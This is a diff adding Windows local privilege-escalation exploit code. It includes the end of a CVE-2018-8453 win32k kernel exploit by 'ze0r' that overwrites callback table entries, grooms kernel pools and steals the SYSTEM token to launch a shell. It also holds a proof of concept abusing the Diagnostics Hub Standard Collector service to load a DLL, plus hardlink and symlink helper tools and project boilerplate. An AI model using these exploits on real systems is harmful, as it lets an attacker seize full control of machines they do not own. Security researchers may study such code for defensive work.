+	buf[19] = CurrentEPS + gConfig.TokenOffset;
+	SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+	GetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+	SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SystemToken);
+
+	Sleep(500);
+	//printf("[*] Swaping shell.\n\n");
+	ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+	stStartUpInfo.cb = sizeof(STARTUPINFO);
+	stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+	stStartUpInfo.wShowWindow = 1;
+	CreateProcess(cmd, NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &stStartUpInfo, &pProcessInfo);
+	Sleep(1000);
+	SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+
+	for (int i = 3000; i < 10000; i++) {
+		if ((hPalettes[i] != hManager) && (hPalettes[i] != hWorker)) {
+			DeleteObject(hPalettes[i]);
+		}
+	}
+	for (int i = 0; i < 8000; i++) {
+		hAccel_ReusePalette[i] = CreateAcceleratorTableW(lpAccel, 0x22);
+	}
+
+	GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+	ReadMem(buf[20] - 0x1f0, 16);
+	ACCELHandle = buf[0];
+	GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+	buf[19] = pKernelHandleTable + (ACCELHandle & 0xffff) * 8;
+	SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+	DeleteDC(hKeepDC);
+
+	buf[0] = 0;
+	buf[1] = 0;
+	SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)buf);
+}
+
+void fnDWORDCallBack(PDWORD msg) {
+
+	if (bMSGSENT && *msg && (*((DWORD*)(*msg)) == (DWORD)hSBWND)) {
+		bMSGSENT = FALSE;
+		DestroyWindow(hMainWND);
+	}
+
+	if (*msg && *(msg + 1) == WM_TIMER) {
+		//printf("[*] Cancel xxxSBTrackLoop.\n");
+		SetCapture(hSBWNDnew);
+	}
+
+	if (*msg && (*(msg + 1) == 0x70) && (*((DWORD*)(*msg)) == (DWORD)hMainWND)) {
+		//printf("[*] ReAlloc Memory.\n");
+		_asm pushad;
+		AfterSBTrackAlloc();
+		_asm popad;
+	}
+	fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PDWORD msg) {
+
+	if ((HWND)*(msg + 3) == hMainWND) {
+		hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+		//printf("[*] Set Window FNID.\n");
+		SetWindowFNID(hMainWND, 0x2A1);
+		SetCapture(hSBWNDnew);
+	}
+	fnClientFreeWindowClassExtraBytes(msg);
+}
+
+int wmain(int argc, wchar_t** argv)
+{
+	if (argc != 4) {
+		return -1;
+	}
+
+	int status = 0;
+	status = swscanf_s(argv[2], L"%lu", &gConfig.UniqueProcessIdOffset);
+	if (!status || status == -1){
+		return -1;
+	}
+
+	status = swscanf_s(argv[3], L"%lu", &gConfig.TokenOffset);
+	if (!status || status == -1){
+		return -1;
+	}
+
+	//printf("////////////////////////////////////////////////////////\n");
+	//printf("//                                                    //\n");
+	//printf("//             CVE-2018-8453 EXPLOIT                  //\n");
+	//printf("//                                  Date  : 2019/1/15 //\n");
+	//printf("//                                  Author: ze0r      //\n");
+	//printf("////////////////////////////////////////////////////////\n\n");
+
+	DWORD  OldProtect = 0;
+	_asm {
+		push eax;
+		mov  eax, fs:[0x30];
+		lea  eax, [eax + 0x2c];
+		mov  eax, [eax];
+		mov  CallbackTb, eax;
+		pop  eax;
+	}
+	VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+
+	// Save/Overwrite fnDWORD callback
+	CallbackTb += 2;
+	fnDWORD = (fct_fnDispatch)*CallbackTb;
+	*CallbackTb = (DWORD)fnDWORDCallBack;
+
+	// Save/Overwrite ExtraBytes callback
+	CallbackTb += 126;
+	fnClientFreeWindowClassExtraBytes = (fct_fnDispatch)*CallbackTb;
+	*CallbackTb = (DWORD)fnClientFreeWindowClassExtraBytesCallBack;
+
+	VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+	SystemCallStub = (DWORD)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "KiFastSystemCall");
+
+	// Accelerator / Keystroke combinations
+	lpAccel = (LPACCEL)malloc(sizeof(ACCEL) * 2);
+	SecureZeroMemory(lpAccel, sizeof(ACCEL));
+
+	WNDCLASSEXW wndClass = { 0 };
+	wndClass = { 0 };
+	wndClass.cbSize = sizeof(WNDCLASSEXW);
+	wndClass.lpfnWndProc = DefWindowProc;
+	wndClass.cbClsExtra = 0;
+	wndClass.cbWndExtra = 1;
+	wndClass.hInstance = GetModuleHandleA(NULL);
+	wndClass.lpszMenuName = NULL;
+	wndClass.lpszClassName = L"WNDCLASSMAIN";
+
+	RegisterClassExW(&wndClass);
+	//printf("[*] CreateWindow.\n");
+	
+	// Creating Main Window (Update Class/Window Names?)
+	hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED, 0, 0, 0, 0, nullptr, nullptr, GetModuleHandleA(NULL), nullptr);
+	hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, GetModuleHandleA(NULL), NULL);
+	SetScrollRange(hSBWND, SB_CTL, 0, 3, TRUE);
+	SetScrollPos(hSBWND, SB_CTL, 3, TRUE);
+
+	// Could we avoid showing the window
+	ShowWindow(hMainWND, SW_SHOW);
+	UpdateWindow(hMainWND);
+
+	///////////////////////////////////////////////////////////////////////////////////
+	// More handles are used to avoid the layout of the secondary handle table that is
+	// allocated when the layout pool is feng shui
+	for (int i = 0; i < 10000; i++) {
+		hPalettes[i] = CreatePaletteOfSize(0xa0, 0x22);
+	}
+	for (int i = 9990; i >= 0; i--) {
+		DeleteObject(hPalettes[i]);
+	}
+	///////////////////////////////////////////////////////////////////////////////////
+	//printf("[*] Deploy Memory.\n");
+	BeforSBTrackAlloc();
+	//printf("[*] SendMessage.\n");
+	bMSGSENT = TRUE;
+	SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+	GetSystem(argv[1]);
+
+	free(lpAccel);
+	return TRUE;
+}
@@ -0,0 +1,96 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{B175079F-C017-4DF1-889A-63417E1E0EDF}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20188453</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2018-8453.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,40 @@
+========================================================================
+    CONSOLE APPLICATION : CVE-2018-8453 Project Overview
+========================================================================
+
+AppWizard has created this CVE-2018-8453 application for you.
+
+This file contains a summary of what you will find in each of the files that
+make up your CVE-2018-8453 application.
+
+
+CVE-2018-8453.vcxproj
+    This is the main project file for VC++ projects generated using an Application Wizard.
+    It contains information about the version of Visual C++ that generated the file, and
+    information about the platforms, configurations, and project features selected with the
+    Application Wizard.
+
+CVE-2018-8453.vcxproj.filters
+    This is the filters file for VC++ projects generated using an Application Wizard. 
+    It contains information about the association between the files in your project 
+    and the filters. This association is used in the IDE to show grouping of files with
+    similar extensions under a specific node (for e.g. ".cpp" files are associated with the
+    "Source Files" filter).
+
+CVE-2018-8453.cpp
+    This is the main application source file.
+
+/////////////////////////////////////////////////////////////////////////////
+Other standard files:
+
+StdAfx.h, StdAfx.cpp
+    These files are used to build a precompiled header (PCH) file
+    named CVE-2018-8453.pch and a precompiled types file named StdAfx.obj.
+
+/////////////////////////////////////////////////////////////////////////////
+Other notes:
+
+AppWizard uses "TODO:" comments to indicate parts of the source code you
+should add to or customize.
+
+/////////////////////////////////////////////////////////////////////////////
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2018-8453.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
@@ -0,0 +1,15 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <stdio.h>
+#include <tchar.h>
+
+
+
+// TODO: reference additional headers your program requires here
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
@@ -0,0 +1,177 @@
+//  Copyright 2015 Google Inc. All Rights Reserved.
+//
+//  Licensed under the Apache License, Version 2.0 (the "License");
+//  you may not use this file except in compliance with the License.
+//  You may obtain a copy of the License at
+//
+//  http ://www.apache.org/licenses/LICENSE-2.0
+//
+//  Unless required by applicable law or agreed to in writing, software
+//  distributed under the License is distributed on an "AS IS" BASIS,
+//  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//  See the License for the specific language governing permissions and
+//  limitations under the License.
+
+#include "stdafx.h"
+#include "CommonUtils.h"
+#include <strsafe.h>
+
+#pragma comment(lib, "Advapi32.lib")
+
+void __stdcall my_puts(const char* str)
+{
+	fwrite(str, 1, strlen(str), stdout);
+}
+
+static console_output _pout = my_puts;
+
+void DebugSetOutput(console_output pout)
+{
+	_pout = pout;
+}
+
+void DebugPrintf(const char* lpFormat, ...)
+{
+	CHAR buf[1024];
+	va_list va;
+
+	va_start(va, lpFormat);
+
+	StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);	
+
+	_pout(buf);
+}
+
+std::wstring GetErrorMessage(DWORD dwError)
+{
+	LPWSTR pBuffer = NULL;
+
+	DWORD dwSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS |
+		FORMAT_MESSAGE_ALLOCATE_BUFFER, 0, dwError, 0, (LPWSTR)&pBuffer, 32 * 1024, nullptr);
+
+	if (dwSize > 0)
+	{
+		std::wstring ret = pBuffer;
+
+		LocalFree(pBuffer);
+
+		return ret;
+	}
+	else
+	{
+		printf("Error getting message %d\n", GetLastError());
+		WCHAR buf[64];
+		StringCchPrintf(buf, _countof(buf), L"%d", dwError);
+		return buf;
+	}
+}
+
+std::wstring GetErrorMessage()
+{
+	return GetErrorMessage(GetLastError());
+}
+
+
+BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
+{
+	TOKEN_PRIVILEGES tp;
+	LUID luid;
+
+	if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
+	{
+		return FALSE;
+	}
+
+	tp.PrivilegeCount = 1;
+	tp.Privileges[0].Luid = luid;
+	if (bEnablePrivilege)
+	{
+		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+	}
+	else
+	{
+		tp.Privileges[0].Attributes = 0;
+	}
+
+	if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
+	{
+		return FALSE;
+	}
+
+	if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
+	{
+		return FALSE;
+	}
+
+	return TRUE;
+}
+
+DWORD NtStatusToDosError(NTSTATUS status)
+{
+	DEFINE_NTDLL(RtlNtStatusToDosError);
+	return fRtlNtStatusToDosError(status);
+}
+
+void SetNtLastError(NTSTATUS status)
+{
+	SetLastError(NtStatusToDosError(status));
+}
+
+FARPROC GetProcAddressNT(LPCSTR lpName)
+{
+	return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
+}
+
+HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options)
+{
+	UNICODE_STRING name = { 0 };
+	OBJECT_ATTRIBUTES obj_attr = { 0 };
+
+	DEFINE_NTDLL(RtlInitUnicodeString);
+	DEFINE_NTDLL(NtOpenFile);
+
+	if (path)
+	{
+		fRtlInitUnicodeString(&name, path);
+		InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
+	}
+	else
+	{
+		InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr);
+	}
+
+	HANDLE h = nullptr;
+	IO_STATUS_BLOCK io_status = { 0 };
+	NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options);
+	if (NT_SUCCESS(status))
+	{
+		return h;
+	}
+	else
+	{
+		SetNtLastError(status);
+		return nullptr;
+	}
+}
+
+std::wstring BuildFullPath(const std::wstring& path, bool native)
+{
+	std::wstring ret;
+	WCHAR buf[MAX_PATH];
+
+	if (native)
+	{
+		ret = L"\\??\\";
+	}
+
+	if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0)
+	{
+		ret += buf;
+	}
+	else
+	{
+		ret += path;
+	}
+
+	return ret;
+}
@@ -0,0 +1,23 @@
+#pragma once
+
+#include <Windows.h>
+#include <string>
+
+typedef void(__stdcall *console_output)(const char*);
+
+void DebugSetOutput(console_output pout);
+void DebugPrintf(const char* lpFormat, ...);
+HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname);
+HANDLE OpenSymlink(HANDLE root, LPCWSTR linkname);
+HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow);
+HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR dirname);
+std::wstring GetErrorMessage(DWORD dwError);
+std::wstring GetErrorMessage();
+BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege);
+bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile);
+bool DeleteRegSymlink(LPCWSTR lpSymlink);
+DWORD NtStatusToDosError(NTSTATUS status);
+bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname);
+HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options);
+std::wstring BuildFullPath(const std::wstring& path, bool native);
+FARPROC GetProcAddressNT(LPCSTR lpName);
@@ -0,0 +1,81 @@
+//  Copyright 2015 Google Inc. All Rights Reserved.
+//
+//  Licensed under the Apache License, Version 2.0 (the "License");
+//  you may not use this file except in compliance with the License.
+//  You may obtain a copy of the License at
+//
+//  http ://www.apache.org/licenses/LICENSE-2.0
+//
+//  Unless required by applicable law or agreed to in writing, software
+//  distributed under the License is distributed on an "AS IS" BASIS,
+//  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//  See the License for the specific language governing permissions and
+//  limitations under the License.
+
+#include "stdafx.h"
+
+#ifndef _UNICODE
+#define _UNICODE
+#endif
+
+#ifndef UNICODE
+typedef std::string String;
+#else
+typedef std::wstring String;
+#endif
+
+bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname)
+{
+	std::wstring full_linkname = BuildFullPath(linkname, true);
+	size_t len = full_linkname.size() * sizeof(WCHAR);
+
+	typed_buffer_ptr<FILE_LINK_INFORMATION> link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR));
+
+	memcpy(&link_info->FileName[0], full_linkname.c_str(), len);
+	link_info->ReplaceIfExists = TRUE;
+	link_info->FileNameLength = len;
+
+	std::wstring full_targetname = BuildFullPath(targetname, true);
+
+	HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0);
+	if (hFile)
+	{
+		DEFINE_NTDLL(ZwSetInformationFile);
+		IO_STATUS_BLOCK io_status = { 0 };
+
+		NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, link_info.size(), FileLinkInformation);
+		CloseHandle(hFile);
+		if (NT_SUCCESS(status))
+		{
+			return true;
+		}
+		SetNtLastError(status);
+	}
+
+	return false;
+}
+
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+	if (argc < 3)
+	{
+		printf("CreateHardLink hardlink target\n");
+		printf("Example: hello.txt goodbye.txt\n");
+		return 1;
+	}
+	else
+	{
+		if (CreateNativeHardlink(argv[1], argv[2]))
+		{
+			printf("Done\n");
+		}
+		else
+		{
+			printf("Error creating hardlink");
+			return 1;
+		}
+	}
+
+	return 0;
+}
@@ -0,0 +1,132 @@
+// PocStorSvc.cpp : Defines the entry point for the console application.
+//
+
+#include "rpc_h.h"
+#include <string>
+#include <sddl.h>
+#include <strsafe.h>
+#include <comdef.h>
+#include "ScopedHandle.h"
+
+GUID CLSID_CollectorService =
+{ 0x42CBFAA7, 0xA4A7, 0x47BB,{ 0xB4, 0x22, 0xBD, 0x10, 0xE9, 0xD0, 0x27, 0x00, } };
+
+class __declspec(uuid("f23721ef-7205-4319-83a0-60078d3ca922")) ICollectionSession : public IUnknown {
+public:
+
+    virtual HRESULT __stdcall PostStringToListener(REFGUID, LPWSTR) = 0;
+    virtual HRESULT __stdcall PostBytesToListener() = 0;
+    virtual HRESULT __stdcall AddAgent(LPWSTR path, REFGUID) = 0;
+};
+
+struct SessionConfiguration
+{
+    DWORD version; // Needs to be 1
+    DWORD  a1;     // Unknown
+    DWORD  something; // Also unknown
+    DWORD  monitor_pid;
+    GUID   guid;
+    BSTR   path;    // Path to a valid directory
+    USHORT trailing;
+};
+
+class __declspec(uuid("7e912832-d5e1-4105-8ce1-9aadd30a3809")) IStandardCollectorClientDelegate : public IUnknown
+{
+};
+
+class __declspec(uuid("0d8af6b7-efd5-4f6d-a834-314740ab8caa")) IStandardCollectorService : public IUnknown
+{
+public:
+    virtual HRESULT __stdcall CreateSession(SessionConfiguration *, IStandardCollectorClientDelegate *, ICollectionSession **) = 0;
+    virtual HRESULT __stdcall GetSession(REFGUID, ICollectionSession **) = 0;
+    virtual HRESULT __stdcall DestroySession(REFGUID) = 0;
+    virtual HRESULT __stdcall DestroySessionAsync(REFGUID) = 0;
+    virtual HRESULT __stdcall AddLifetimeMonitorProcessIdForSession(REFGUID, int) = 0;
+};
+
+_COM_SMARTPTR_TYPEDEF(IStandardCollectorService, __uuidof(IStandardCollectorService));
+_COM_SMARTPTR_TYPEDEF(ICollectionSession, __uuidof(ICollectionSession));
+
+class CoInit
+{
+public:
+    CoInit() {
+        CoInitialize(nullptr);
+    }
+
+    ~CoInit() {
+        CoUninitialize();
+    }
+};
+
+void ThrowOnError(HRESULT hr)
+{
+    if (hr != 0)
+    {
+        throw _com_error(hr);
+    }
+}
+
+void LoadDll()
+{
+    CoInit coinit;
+    try
+    {
+        GUID name;
+        CoCreateGuid(&name);
+        LPOLESTR name_str;
+        StringFromIID(name, &name_str);
+
+        WCHAR valid_dir[MAX_PATH];
+        GetModuleFileName(nullptr, valid_dir, MAX_PATH);
+        WCHAR* p = wcsrchr(valid_dir, L'\\');
+        *p = 0;
+        StringCchCat(valid_dir, MAX_PATH, L"\\etw");
+        CreateDirectory(valid_dir, nullptr);
+
+        IStandardCollectorServicePtr service;
+        CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service));
+		DWORD authn_svc;
+        DWORD authz_svc;
+        LPOLESTR principal_name;
+        DWORD authn_level;
+        DWORD imp_level;
+        RPC_AUTH_IDENTITY_HANDLE identity;
+        DWORD capabilities;
+
+        CoQueryProxyBlanket(service, &authn_svc, &authz_svc, &principal_name, &authn_level, &imp_level, &identity, &capabilities);
+        CoSetProxyBlanket(service, authn_svc, authz_svc, principal_name, authn_level, RPC_C_IMP_LEVEL_IMPERSONATE, identity, capabilities);
+        SessionConfiguration config = {};
+        config.version = 1;
+        config.monitor_pid = ::GetCurrentProcessId();
+        CoCreateGuid(&config.guid);
+        bstr_t path = valid_dir;
+        config.path = path;
+        ICollectionSessionPtr session;
+
+        service->CreateSession(&config, nullptr, &session);
+        GUID agent_guid;
+        CoCreateGuid(&agent_guid);
+        session->AddAgent(L"license.rtf", agent_guid);
+    }
+    catch (const _com_error& error)
+    {
+        if (error.Error() == 0x8007045A)
+        {
+            printf("DLL should have been loaded\n");
+        }
+        else
+        {
+            printf("%ls\n", error.ErrorMessage());
+            printf("%08X\n", error.Error());
+        }
+    }
+}
+
+int wmain(int argc, wchar_t** argv)
+{
+    LoadDll();
+
+    return 0;
+}
+
@@ -0,0 +1,94 @@
+//  Copyright 2015 Google Inc. All Rights Reserved.
+//
+//  Licensed under the Apache License, Version 2.0 (the "License");
+//  you may not use this file except in compliance with the License.
+//  You may obtain a copy of the License at
+//
+//  http ://www.apache.org/licenses/LICENSE-2.0
+//
+//  Unless required by applicable law or agreed to in writing, software
+//  distributed under the License is distributed on an "AS IS" BASIS,
+//  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//  See the License for the specific language governing permissions and
+//  limitations under the License.
+
+#include "stdafx.h"
+#include "ScopedHandle.h"
+
+static HANDLE Duplicate(HANDLE h)
+{
+	HANDLE dup;
+
+	if ((h == INVALID_HANDLE_VALUE) || !DuplicateHandle(GetCurrentProcess(), h, GetCurrentProcess(), &dup, 0, FALSE, DUPLICATE_SAME_ACCESS))
+	{
+		return nullptr;
+	}
+	else
+	{
+		return dup;
+	}
+}
+
+ScopedHandle::ScopedHandle(HANDLE h, bool duplicate)
+{	
+	if (duplicate)
+	{
+		g_h = Duplicate(h);
+	}
+	else
+	{
+		g_h = h;
+	}
+}
+
+ScopedHandle::ScopedHandle(const ScopedHandle& other)
+{
+	g_h = Duplicate(other.g_h);
+}
+
+ScopedHandle& ScopedHandle::operator=(const ScopedHandle& other)
+{
+	if (this != &other)
+	{
+		g_h = Duplicate(other.g_h);
+	}
+
+	return *this;
+}
+
+ScopedHandle::ScopedHandle(ScopedHandle&& other)
+{
+	g_h = other.g_h;
+	other.g_h = nullptr;
+}
+
+ScopedHandle& ScopedHandle::operator=(ScopedHandle&& other)
+{
+	if (this != &other)
+	{
+		g_h = other.g_h;
+		other.g_h = nullptr;
+	}
+
+	return *this;
+}
+
+void ScopedHandle::Close() 
+{
+	if (IsValid())
+	{
+		CloseHandle(g_h);
+		g_h = nullptr;
+	}
+}
+
+void ScopedHandle::Reset(HANDLE h)
+{
+	Close();
+	g_h = h;
+}
+
+ScopedHandle::~ScopedHandle()
+{
+	Close();
+}
@@ -0,0 +1,25 @@
+#pragma once
+class ScopedHandle
+{
+	HANDLE g_h;
+
+public:
+	ScopedHandle(HANDLE h, bool duplicate);
+	void Close();
+	void Reset(HANDLE h);
+	bool IsValid() const {
+		return (g_h != nullptr) && (g_h != INVALID_HANDLE_VALUE);
+	}
+	ScopedHandle(const ScopedHandle& other);
+	ScopedHandle& operator=(const ScopedHandle& other);
+
+	ScopedHandle(ScopedHandle&& other);	
+	ScopedHandle& operator=(ScopedHandle&& other);
+
+	operator HANDLE() const {
+		return g_h;
+	}	
+
+	~ScopedHandle();
+};
+
@@ -0,0 +1,51 @@
+#pragma once
+
+#include <Windows.h>
+#include <winternl.h>
+
+#define DIRECTORY_QUERY 0x0001
+#define DIRECTORY_TRAVERSE 0x0002
+#define DIRECTORY_CREATE_OBJECT 0x0004
+#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008
+#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
+
+typedef NTSTATUS(NTAPI *_NtCreateDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
+typedef NTSTATUS(NTAPI *_NtCreateDirectoryObjectEx)(PHANDLE Handle, ACCESS_MASK DesiredAccess,
+	POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ShadowDir, BOOLEAN Something);
+typedef NTSTATUS(NTAPI *_NtOpenDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
+typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
+
+#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
+
+typedef NTSTATUS(NTAPI* _NtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);
+typedef NTSTATUS(NTAPI* _NtOpenSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
+typedef NTSTATUS(NTAPI* _NtQuerySymbolicLinkObject)(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength);
+typedef NTSTATUS(NTAPI* _NtOpenFile)(
+	_Out_ PHANDLE            FileHandle,
+	_In_  ACCESS_MASK        DesiredAccess,
+	_In_  POBJECT_ATTRIBUTES ObjectAttributes,
+	_Out_ PIO_STATUS_BLOCK   IoStatusBlock,
+	_In_  ULONG              ShareAccess,
